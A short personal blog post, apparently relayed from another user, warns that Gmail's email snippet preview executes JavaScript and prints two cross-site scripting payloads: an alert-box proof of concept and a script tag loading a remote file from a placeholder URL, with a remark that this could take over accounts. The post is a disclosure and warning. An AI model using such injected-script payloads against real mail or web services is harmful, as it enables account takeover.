John "The Gneech" Robey (the_gneech) wrote,
John "The Gneech" Robey
the_gneech

From indigoskynet!

Gmail has a major security bug.

You know how it shows 'snippets' of the email near the subject line? If the snippet is javascript, gmail will execute it.

Yea.

It only works if you send it from an address thats *not* gmail, and apparently it has to have a subject, and it has to be a new page load, not a automatic refresh.

Very odd, but yea. It works.

1<SCRIPT>alert("haha")</SCRIPT>

So, if I can get this to load a remotely hosted .js file I could easily takeover your gmail account.
Right now, as for me, I'm turning off the snippet option.

UPDATE:
1<SCRIPT SRC="URL"> will indeed execute. This means that a javascript file any size can be executed, not just a tiny bit that fits in the snippet. We're talking major security flaw now. At best you can hope your firewall will catch it if its trying to damage your computer.


Yeeks! *turns of snippets until further notice*

-TG
Subscribe
  • Post a new comment

    Error

    Anonymous comments are disabled in this journal

    default userpic

    Your reply will be screened

  • 13 comments